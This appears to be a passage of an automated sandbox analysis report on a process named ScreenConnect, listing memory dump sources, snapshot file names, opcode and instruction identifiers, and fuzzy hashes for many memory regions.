                                                                                            • Source File: 00000009.00000002.2607987999.00007FF886C3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C3A000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_7ff886c3a000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 929664b9ea07da2bf83b95dbb80e6034a00f4ec9f1c38fdfa784b5507a0e3269
                                                                                            • Instruction ID: d255236bb4b248a12868c4ef9852ba35b577ada456936312cc8d52fe735ee4ea
                                                                                            • Opcode Fuzzy Hash: 929664b9ea07da2bf83b95dbb80e6034a00f4ec9f1c38fdfa784b5507a0e3269
                                                                                            • Instruction Fuzzy Hash: CD418430A58A498FEB98EF6CC495A7577E2FF6434075400B9D08EC76A6DE24FC46C781
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2617339609.00007FF886F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886F40000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_7ff886f40000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7ba69278f1ac8587eadd0d5d5b1999912fa52e34d46ccc0524a7bb9117f9e145
                                                                                            • Instruction ID: 9a6d59cdb352a45c51d97ee0df29208ccd3739c3eeff9b0f239e6a73aeb79db1
                                                                                            • Opcode Fuzzy Hash: 7ba69278f1ac8587eadd0d5d5b1999912fa52e34d46ccc0524a7bb9117f9e145
                                                                                            • Instruction Fuzzy Hash: 2631601BD4E7E64EE313672CA8A54D47F60EE921B9B0D01FBC5C8DB0E3E815584AC2A5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2607987999.00007FF886C3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C3A000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_7ff886c3a000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ceff910d2d2cacc7b961afe68d5b37f73ffff7efe96a72736384b6fab022ae3f
                                                                                            • Instruction ID: a1f396ed48eea4e5566f539be17d16e419207d9ac60189356f5135a20eddbbd7
                                                                                            • Opcode Fuzzy Hash: ceff910d2d2cacc7b961afe68d5b37f73ffff7efe96a72736384b6fab022ae3f
                                                                                            • Instruction Fuzzy Hash: D131C421D1D7CF4FE746A7688AA82A87FB1FF92240F4804EAC448C7093DD296D45D742
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2607987999.00007FF886C3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C3A000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_7ff886c3a000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 003803a642ca75e8db8df5650eb09c0010869efdd90ffca012a25c4d1890a7e5
                                                                                            • Instruction ID: 2b825276a17aa8e5e630ff4acf201ea79c6ed0bc5f82201ce5e262c840fb8033
                                                                                            • Opcode Fuzzy Hash: 003803a642ca75e8db8df5650eb09c0010869efdd90ffca012a25c4d1890a7e5
                                                                                            • Instruction Fuzzy Hash: 0621F711A5DA8B4FD7569B38AC685723FE2FF9A24074801F7D049CB196ED08AC46C342
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2617339609.00007FF886F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886F40000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_7ff886f40000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e38af532e5825425ea1b68517669dfc8e2b7454c37544a160dc803a8b602dfc6
                                                                                            • Instruction ID: 1d41d1eb3a5981ab3afa63136977b8a51c84ee7697e0e4e0244ee41ac1ce5399
                                                                                            • Opcode Fuzzy Hash: e38af532e5825425ea1b68517669dfc8e2b7454c37544a160dc803a8b602dfc6
                                                                                            • Instruction Fuzzy Hash: 00318F16D4E7E64EE303672CA8A54D47F50EE921B9B0D01FBC1C8DB0E3E815584AC2A5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2607987999.00007FF886C3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C3A000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_7ff886c3a000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8fa3977fe010be2d8bb610197fd9095749f78659beac3e586d4eeefceb933159
                                                                                            • Instruction ID: 62749b70954cf49e33284d31913cefbef96127382bfe9b6ea6c474a24c9ae969
                                                                                            • Opcode Fuzzy Hash: 8fa3977fe010be2d8bb610197fd9095749f78659beac3e586d4eeefceb933159
                                                                                            • Instruction Fuzzy Hash: A9210132E88D4D8FD794EB6C98899BA7BE1FF98394B0001BAD04DC7552DA24AC0687C0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2617339609.00007FF886F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886F40000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_7ff886f40000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7be32f188063806ff4715fb768f90e8565499732d0f20f0ba09f01b3b26fea20
                                                                                            • Instruction ID: 6422ef2d064de1ad030f8f210652cd0fb1deeb2df83420d655a898d8dcb16c7d
                                                                                            • Opcode Fuzzy Hash: 7be32f188063806ff4715fb768f90e8565499732d0f20f0ba09f01b3b26fea20
                                                                                            • Instruction Fuzzy Hash: C421F221A5CA8E0FE798EA6CA8A127476D1FF98390F4400BAD44DD32C7ED19EC818342
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2607987999.00007FF886C3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C3A000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_7ff886c3a000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: dac730241aac7592172cbeca23672c74382461344eb9310514a0d5e1d82d6803
                                                                                            • Instruction ID: 1f1c4a9f497768fc71f15bd63bdb8eebfd92d7dc547375918d53eae3f84fd2d7
                                                                                            • Opcode Fuzzy Hash: dac730241aac7592172cbeca23672c74382461344eb9310514a0d5e1d82d6803
                                                                                            • Instruction Fuzzy Hash: F221B031A8895D8FEB54EF18D448AEA7BE1FFA9350F0501B6E40DC71A1DA24D955CBC0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2617339609.00007FF886F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886F40000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_7ff886f40000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7f6cb9028175295c70d19bf432997d1817179fcc63c99c79f5855b5823aa80f7
                                                                                            • Instruction ID: c7e785cc8a7c789dadfe214e53aa1affe6078a3a57cace6baf7b585cf5fb624e
                                                                                            • Opcode Fuzzy Hash: 7f6cb9028175295c70d19bf432997d1817179fcc63c99c79f5855b5823aa80f7
                                                                                            • Instruction Fuzzy Hash: BB21F851D5EACA0FD346933C58666713BE1FF92650B4841EAC418CB1DBEE0CEC0AD342
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2607987999.00007FF886C3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C3A000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_7ff886c3a000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7949ee8580510233bc26d21afd7ca3796ec2dfb6c388b7109ae18db5e1d08f70
                                                                                            • Instruction ID: 7f9da2de18d571cc052d6627fdbae42a9c5656110772704d07245e6bf8cce6ad
                                                                                            • Opcode Fuzzy Hash: 7949ee8580510233bc26d21afd7ca3796ec2dfb6c388b7109ae18db5e1d08f70
                                                                                            • Instruction Fuzzy Hash: 4721C831F28E478BDB49AB6C99496E573D1FF54744700017AC00EC3596DD28EC559781
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2607987999.00007FF886C3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C3A000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_7ff886c3a000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 19e6ede30348f5e39ba04aaff9fdc85141a51dd6dfbb31b67a58506538c5f9be
                                                                                            • Instruction ID: c8ad9ea8dbf29b13e4110509758558ee4128294366f8ea7410d96e1ca6012641
                                                                                            • Opcode Fuzzy Hash: 19e6ede30348f5e39ba04aaff9fdc85141a51dd6dfbb31b67a58506538c5f9be
                                                                                            • Instruction Fuzzy Hash: 3221F03095869F8FD782EFA4C8147EA7BF1FF49250F0501BAE489C3192CA2C5D40C792
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2617339609.00007FF886F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886F40000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_7ff886f40000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d9a839b65d6f0bce1b674633de8e171e5b8220bbdc2aaffeaaddff7012e012ed
                                                                                            • Instruction ID: ab63f9a50bff4fe7504e126479d3c645c94760488dd0d32a5613602336c463bf
                                                                                            • Opcode Fuzzy Hash: d9a839b65d6f0bce1b674633de8e171e5b8220bbdc2aaffeaaddff7012e012ed
                                                                                            • Instruction Fuzzy Hash: 8F113631E4CA8C8FEB90EB2894556B977E0FFA9300F4000AAD04DD3692CE24EC01C342
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2607987999.00007FF886C3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C3A000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_7ff886c3a000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 95c6c3b463387e83fa67340eabafede5b816da409b8b3b70df84cc276ac4f295
                                                                                            • Instruction ID: 25f5b64714bf0d0ae28a7591f73c5432830a7e770f963f5d7d26a10fdaa0e05c
                                                                                            • Opcode Fuzzy Hash: 95c6c3b463387e83fa67340eabafede5b816da409b8b3b70df84cc276ac4f295
                                                                                            • Instruction Fuzzy Hash: ED11E221A1DBCA0FD7869B6C54652A56BA1FF6522071802F7C00CC71E7E918D8059342
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2617339609.00007FF886F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886F40000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_7ff886f40000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d52e88a4e42da96aa189b42f09fa5265eeee278a2972f564c334be22b79741d6
                                                                                            • Instruction ID: 0e16cb8b19dd6366b5dd5d6806a82dd065799d9a84e9f54a99fab55a51ed390f
                                                                                            • Opcode Fuzzy Hash: d52e88a4e42da96aa189b42f09fa5265eeee278a2972f564c334be22b79741d6
                                                                                            • Instruction Fuzzy Hash: D611E771E8CA8C8FDB869F6458751B83BE0FF55344F090099D04CD76A2CB249810C741
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2607987999.00007FF886C3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C3A000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_7ff886c3a000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 866582fa31ec1e1cd5e08c001200826c24264465a303a6fbe13cd21bcdb6cd1e
                                                                                            • Instruction ID: 06c20876ff976db40309535c7cb10a5d816081cf9ac445fd76ca8f54defad00c
                                                                                            • Opcode Fuzzy Hash: 866582fa31ec1e1cd5e08c001200826c24264465a303a6fbe13cd21bcdb6cd1e
                                                                                            • Instruction Fuzzy Hash: F701B522F5DC4A4B97D8D66CB8446B5B3D2FFE8264B140377D00CC3689ED19DC828341
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2607987999.00007FF886C3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C3A000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_7ff886c3a000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 71426dd21dcc7018b0ec23f5613e4865efaeab67d114f5b24cc744872a7b45ed
                                                                                            • Instruction ID: 383d503f04dbd95d4dd34c1d13a262f0483ac4bb725866949bfc1e31e8df60ed
                                                                                            • Opcode Fuzzy Hash: 71426dd21dcc7018b0ec23f5613e4865efaeab67d114f5b24cc744872a7b45ed
                                                                                            • Instruction Fuzzy Hash: 3A11D630B5895E8FDB94EB68D454AA9B3E2FF98341B50007AD40ED32A1DE29AC00CB01
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2617339609.00007FF886F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886F40000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_7ff886f40000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 1f0abb171d63c6aabb250796a9c0ce8eca4c860b65358d6b4906ff9a0c1a3ea0
                                                                                            • Instruction ID: a7f67475f2de13e332132ca2d01a8bed9157e107b3f653f65cbe5668a2dfb68c
                                                                                            • Opcode Fuzzy Hash: 1f0abb171d63c6aabb250796a9c0ce8eca4c860b65358d6b4906ff9a0c1a3ea0
                                                                                            • Instruction Fuzzy Hash: AC110615D4CB5B0FF769922845613746AE1FF852C0F0980BAC44DE65DBDC2DDC81D301
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2607987999.00007FF886C3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C3A000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_7ff886c3a000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 1263a7427301ee4c1cc3ee1af266f2616210a3df50127de3f5433ac13d2677b0
                                                                                            • Instruction ID: a5cba3ab9e4b274e68c1b6094a986ffd274b3b52f8da9616da091c680809a0e6
                                                                                            • Opcode Fuzzy Hash: 1263a7427301ee4c1cc3ee1af266f2616210a3df50127de3f5433ac13d2677b0
                                                                                            • Instruction Fuzzy Hash: 01117071908A8D4FDB45EF6CC8056ED7BE1FF68315F0402AAD40DEB252CA349804CB81
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2607987999.00007FF886C3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C3A000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_7ff886c3a000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a1026ca59ff205b3ccd0a68a41ed90a6903e374fd329fe38c601dd70b831d7de
                                                                                            • Instruction ID: b0c390a5113d5137a4fe0050ca1dd98791ee329896d9b4e5606ff253adbe5acf
                                                                                            • Opcode Fuzzy Hash: a1026ca59ff205b3ccd0a68a41ed90a6903e374fd329fe38c601dd70b831d7de
                                                                                            • Instruction Fuzzy Hash: 0B01C47090868D8FCB46DF68C8056E97FE0FF59314B0541A6E44CD7261CB349944CB92
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2607987999.00007FF886C3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C3A000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_7ff886c3a000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 50bbab113c4544480db98bb54177adbc648000c4ccab38244b0b96df0da75d32
                                                                                            • Instruction ID: d3f9aff9b320d9d9bf2235ffc87b17b788966498f23c36e198451a05a901990b
                                                                                            • Opcode Fuzzy Hash: 50bbab113c4544480db98bb54177adbc648000c4ccab38244b0b96df0da75d32
                                                                                            • Instruction Fuzzy Hash: 1D11C23091EA824FD343E768E4657E57BE1AF422A8B0900FBC09ECA1E3DD193C49D756
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2607987999.00007FF886C3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C3A000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_7ff886c3a000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 850f43b023ddd4cfcb0601a5100ac0ef0b8999fc2adab789654412daaf3da4dd
                                                                                            • Instruction ID: 50a88e09afc40c81449db5587eba74e8d0c1d966393ed6498ada2b0cd6d407fd
                                                                                            • Opcode Fuzzy Hash: 850f43b023ddd4cfcb0601a5100ac0ef0b8999fc2adab789654412daaf3da4dd
                                                                                            • Instruction Fuzzy Hash: 2C01093092495F8FDB90EF68D8057AAB2E1FF18341F41047AE459D3291DE386D508781
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2607987999.00007FF886C3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C3A000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_7ff886c3a000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5e52b70b6dce1b8424c0fe9089ef6f561bd23ec3f7306fddde2b7212be6aeb75
                                                                                            • Instruction ID: bb66440cbd336fba956c0e7f9b141f4c72e9b3ccaba153e50dc48b073fcc7f5d
                                                                                            • Opcode Fuzzy Hash: 5e52b70b6dce1b8424c0fe9089ef6f561bd23ec3f7306fddde2b7212be6aeb75
                                                                                            • Instruction Fuzzy Hash: 2E01B51195CA8A0FD795976CA814AB67BE2FF95250B0842B7D04CC7187D918DC41C352
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2617339609.00007FF886F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886F40000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_7ff886f40000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 516908e0d88daef67556c6716f6edb8540a9b2c0b288c2511d3fa5cc9cf6e6c8
                                                                                            • Instruction ID: 5f747e7fc91b2c66fcf36bb34bba4a334291031dcbf23dc736906d49fabba4a6
                                                                                            • Opcode Fuzzy Hash: 516908e0d88daef67556c6716f6edb8540a9b2c0b288c2511d3fa5cc9cf6e6c8
                                                                                            • Instruction Fuzzy Hash: D901801694D7DB4FE303572C58644E03FA0AF962A9B1900F7C8C8DB0E3E8189C4AC365
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2607987999.00007FF886C3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C3A000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_7ff886c3a000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7a59615bdf3bd7852e8af9f246c8518440f930fabe5143ab820c2a5176d59f45
                                                                                            • Instruction ID: 99cd2bad91f4587efea1fae2d18389bf29516bb7edde30ee5bc9e7aebc8b7615
                                                                                            • Opcode Fuzzy Hash: 7a59615bdf3bd7852e8af9f246c8518440f930fabe5143ab820c2a5176d59f45
                                                                                            • Instruction Fuzzy Hash: F0014C21F2CC8B4FAB85EB6C91446B5B3C1FFA83647540276D40CC3296EC15DC428381
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2607987999.00007FF886C3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C3A000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_7ff886c3a000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d028d621d8a5581b15356b4cb214419eb2e46bb777d6feb19581c57ea36032b8
                                                                                            • Instruction ID: c7500958cf9e417101afb4964923e270e4af99165f58197c138846e665d1e286
                                                                                            • Opcode Fuzzy Hash: d028d621d8a5581b15356b4cb214419eb2e46bb777d6feb19581c57ea36032b8
                                                                                            • Instruction Fuzzy Hash: 42F0A921F28D4B0B9B88EB6CA4856B667D2FBB82647504276D40DC329AED14DC428382
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2607987999.00007FF886C3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C3A000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_7ff886c3a000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 333b27f199a40d18391c7d88cb103f44cec9e779bc665d49d3c1b50e1105425e
                                                                                            • Instruction ID: 6a8a342732d9ed24210a46ceceecf659ad70756219c53fc912bb547fa6100bf0
                                                                                            • Opcode Fuzzy Hash: 333b27f199a40d18391c7d88cb103f44cec9e779bc665d49d3c1b50e1105425e
                                                                                            • Instruction Fuzzy Hash: 5C011E35B18E4B8FDF94EE68C89066533E2FFA974471405A8D41AC728ADA35EC52C740
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2607987999.00007FF886C3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C3A000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_7ff886c3a000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 60a9a3fd914693c42da527ae95e0b65154c5e4dce2cfba792f3481c2e3fc826a
                                                                                            • Instruction ID: f29f5e0247c285a4f460123571fb80f433d00a58fb3fc3509ca13ce1de52355e
                                                                                            • Opcode Fuzzy Hash: 60a9a3fd914693c42da527ae95e0b65154c5e4dce2cfba792f3481c2e3fc826a
                                                                                            • Instruction Fuzzy Hash: 2F016D20B2890B8FE688E65CC5697B477D3FFA8B81F54027DD45EC76E2DE196C018741
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2607987999.00007FF886C3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C3A000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_7ff886c3a000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 82d3b9e22b658ebf123972babb703cd0c450a2a13234a037abaaaa28a687c4b0
                                                                                            • Instruction ID: 9abd84a453563818dec43b9ca879ecd5f8aa205606b87612480ad25f63d404f7
                                                                                            • Opcode Fuzzy Hash: 82d3b9e22b658ebf123972babb703cd0c450a2a13234a037abaaaa28a687c4b0
                                                                                            • Instruction Fuzzy Hash: 47F0C262F9CC1E4BA7E5D6ACB4457B993C2FBA86F1B404272C40EC7294ED189C8247C1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2617339609.00007FF886F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886F40000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_7ff886f40000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 87c561004ab88715eb0a980824a3376634b43962c23555d91dbf7cf30fa603cc
                                                                                            • Instruction ID: cfb3ba02fe454f1ba797fc8dcf53423d3f43b15c559715c613b6b0821ebe10de
                                                                                            • Opcode Fuzzy Hash: 87c561004ab88715eb0a980824a3376634b43962c23555d91dbf7cf30fa603cc
                                                                                            • Instruction Fuzzy Hash: D4012837D4D6A99FD702EA2CA8644E57B90FF1236470800BBE04DCB093EA159C09C781
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2607987999.00007FF886C3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C3A000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_7ff886c3a000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 76174413820467e8f6710274c5bcf35a24d8db73ee5d688d603f6d7bec884a40
                                                                                            • Instruction ID: 28c7dae46feb75aa7ea6c135edda475a750694d95abad643196ec4f554991c9c
                                                                                            • Opcode Fuzzy Hash: 76174413820467e8f6710274c5bcf35a24d8db73ee5d688d603f6d7bec884a40
                                                                                            • Instruction Fuzzy Hash: 97014457D0D9578FF365622C99570647BD1FF5A290B0C09B7CC9CC2193DD065C05D381
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2607987999.00007FF886C3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C3A000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_7ff886c3a000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 56854eb630ea8149b7946af9361a87e2d65415ec389126d632c523cff8229b95
                                                                                            • Instruction ID: 887641f67d0f7518d0bbd816ba18fbc089b0c4af581aea1096ac030b5291d2e7
                                                                                            • Opcode Fuzzy Hash: 56854eb630ea8149b7946af9361a87e2d65415ec389126d632c523cff8229b95
                                                                                            • Instruction Fuzzy Hash: B801D172D4C7899FC752DB74C8692E97FB0FF45300F4600EBC859CB0A2DA286985C702
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2607987999.00007FF886C3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C3A000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_7ff886c3a000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 76d69f000d9c0e9158f5b20870f610b17b26d55579988c56f932d47406bb7dd7
                                                                                            • Instruction ID: dd9412af6c6101d584b32038ceb860f2ada4642fa9603219a8ebd97ae8f9d532
                                                                                            • Opcode Fuzzy Hash: 76d69f000d9c0e9158f5b20870f610b17b26d55579988c56f932d47406bb7dd7
                                                                                            • Instruction Fuzzy Hash: 22F062A2E18F478BEBA8DA6CA59627A23D2FF68BD07440075C00DC72D6ED14EC029280
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2607987999.00007FF886C3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C3A000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_7ff886c3a000_ScreenConnect.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 95ae9373ac9e66fabc32dc140253cc414e4532d6dea2e9853ac50fc3ab08f478
                                                                                            • Instruction ID: 21a89ff21ac70ae9924a243fd5b8ded294ad070a8db0cc39460a2c4e1ef5fab0
                                                                                            • Opcode Fuzzy Hash: 95ae9373ac9e66fabc32dc140253cc414e4532d6dea2e9853ac50fc3ab08f478
